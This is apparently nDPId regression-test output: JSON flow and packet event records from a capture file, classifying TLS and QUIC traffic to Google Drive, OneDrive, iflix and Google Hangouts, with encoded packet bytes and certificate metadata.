+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} +01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} +01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} +01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1646495785326,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785326,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARxpLAqAGA2DrUjpbyAbsFVWFvygAAAAEIEaJhA\/pmmGIDGZVnAEJ9k4MXlQzkENByBWBPG6JdLnJ97tZTge\/8kX\/RhzOqc4jakqIni2HiqmCs6hTSmZEhkbOUs3lvKsO9F9+XIhOeXqIykOCxzeDPOvDHVnxP2ftNUD1lroHjevW4+JYs\/R0VPIgtCayG\/meCf7Lef9QhWL6YQmXx48ui2W6tYfyIEiaXDMtExoqL+hacVg2HpNlIwJe4PE0\/HEg3ezCS0HD8j4RVM2gk+MitT95qpQmfRz8ntx5WznfpVZvMxU23bid9\/dO3KP4LRTXApe0VNoqcMS8eAgkUyCgd5nSQ87LPgFqnkCEFratISm41sDhhr7ve32C1I\/TlAIhgBRfW87C3WFDVCBagaYOeonExydEo\/D28evz\/tjH6aV7xu0wNblTQywt3lynmNkuwCW7cnmeQuau6oQOA9GiSOfN51L3rFmCObunfGa2ezZE4y2FjFlEEKO\/QIf2CassSbDJm49YK5w7PoSq58kn\/6qIb0Tn5xVj\/LonVQw1HAkNmcP8ql0C7shrF43UdoYXvT\/hOCOA\/VAd6JiIod3M38vXNHkTBOnLJf9TfjJE64UfVXvq5UqVG0r6WldLJGu2xtNgpeDi11dyXdfvaPJX4DN1wutu28hbCiIktfSp6wZpMBmAyygGuO73TqglRovt2xSE4EHwrJMCD4O2TYEurb9uUa0gMyyJFr9\/L+BwLQIYk52z2VLzFmq3EMYlrlu4r\/zm7z83+qa7ryx2Qegl3wdMjyEciWgqgcac28uJhD3lOGWLmvmFxM9fEY1jJKzrVnaWs\/i+ophLeLFpkmeSef74TmyzGpEZIsuPNpoyrlLRH7YPjpxJQS81Wg3bRzpRPypt93N8AAAABCBGiYQP6ZphiAxmVZ0A7KMwiGjnAKddrCOyv2PDiBRWs1qpECiw2xTVInm4f3DIdG9S3r6Co1Q+QqgROt51vL3O9dOvlXAZmpcYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495785326,"flow_last_seen":1646495785326,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495785326,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"hangouts.google.com","version":"TLSv1.3","alpn":"h3","ja3":"2a18e6bf307f97c5e27f0ab407dc65db","tls_supported_versions":"TLSv1.3"}} 02279{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1646495785351,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495785351,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMR0xLYOtSOwKgBgAG7lvIFVdbOwgAAAAEDGZVnCBGiYQP6ZphiAEPst9JjIfZ6zFXkACoVjtJE04mEvUBO80J9CXDI1AzGWloBOqzPXI+URdYvHEecgUeYllSRgTGQ\/pdzmzfdkga4V0DlNh9sMthgcZTrWfMiNpOkeHh+8VGEpoSOyr5bTtr6qKEGYg7ZZM+3g8CNri4\/Y4rmU\/u2ucvFt3wUyTEBNlGlntUryhGUoERRNT55NmFJqVuhU\/GueMTfSHsKfOOCMhdksMgHmrVyRumUWVrccMpyqwcE3vpmgCs+uFNthYNXlEj8FMdYAA6FIKpTcrXTgZ3Nm3DRRlDCt76rYa9Ed5zm8JxO+MhvWTGGpqVfgXpQEWyeWMNxG693XFsxTB07PJ3\/YeWP9LrYnM2HgdinrEmJ9dHI16vwi5FQ0cWQJ92cHEvIGKGiq8SA5HEgTnQVmdK2xOmx7dj0KaicL3ol58t8ltkbIXgfkxYhp5yyTHcH3z0UKdCT7GAS6tTRIUS1R7xH75rixlq6B8ZSkGHfajnn6P2ZcdZ\/x0f91Ed0FleO4gdbHHIHetNxBiPPjmSYid1gKObR53SjxAV83g\/W5uVBPG0cabwLojDjBF4yItmMF8ard0uchzKjL7+VPzEBpyA8VAKvlvVbjeonWQ9zdLjCu+3DI5DnZF04lHG772bPMCDbbp1L2TwHKUlogQBjbGpHA7cGqXQ+7rgXzsp8A1LJ4M7UOfhwAhpEZinbjHrtptlKXt3FIxug5QT3rZRFmRCTzNoEN+lueCUbvABz5ahUadsFXVwk+QV6y6OfittlgN9FPzvu2wbXQsdpR7HuGw5be5n5hrjM\/gt9Cn1qYtj8W7tpYyeOF6J2KVyL\/JC\/QJoDFTRmNJOaSu8I9GPipG+PZyHfbkz460Q5SYy9J6Yty8H0OpgvMOxAZyJfdY6HpBJ